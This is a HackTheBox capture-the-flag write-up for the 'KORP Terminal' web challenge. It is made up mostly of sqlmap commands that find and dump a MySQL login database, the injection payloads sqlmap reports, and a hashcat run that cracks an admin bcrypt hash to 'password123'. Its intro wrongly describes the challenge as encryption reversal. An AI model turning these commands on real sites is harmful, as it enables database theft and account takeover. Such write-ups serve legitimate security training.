Post

HackTheBox KORP Terminal Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the KORP Terminal Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1

sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401

1
2
3
4
5
6
7
8
9
10
11
12
13
14

---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=a' RLIKE (SELECT (CASE WHEN (5665=5665) THEN 0x61 ELSE 0x28 END))-- Isul&password=a

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=a' OR (SELECT 8955 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT (ELT(8955=8955,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pzFe&password=a

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=a' AND (SELECT 1571 FROM (SELECT(SLEEP(5)))MEYL)-- abGQ&password=a
---

1

sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 --dbs

1

sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 -D korp_terminal --tables

1

sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 -dump

Brute Force the Hash

1
2
3
4
5

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

this yelds password123 so admin:password123

Summary

KORP Terminal exploits an SQL injection vulnerability using sqlmap to enumerate the korp_terminal database, extract credentials, and crack the admin password (password123) with hashcat. The credentials are then used to access the flag, highlighting risks in poorly sanitized inputs and insecure SQL queries.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.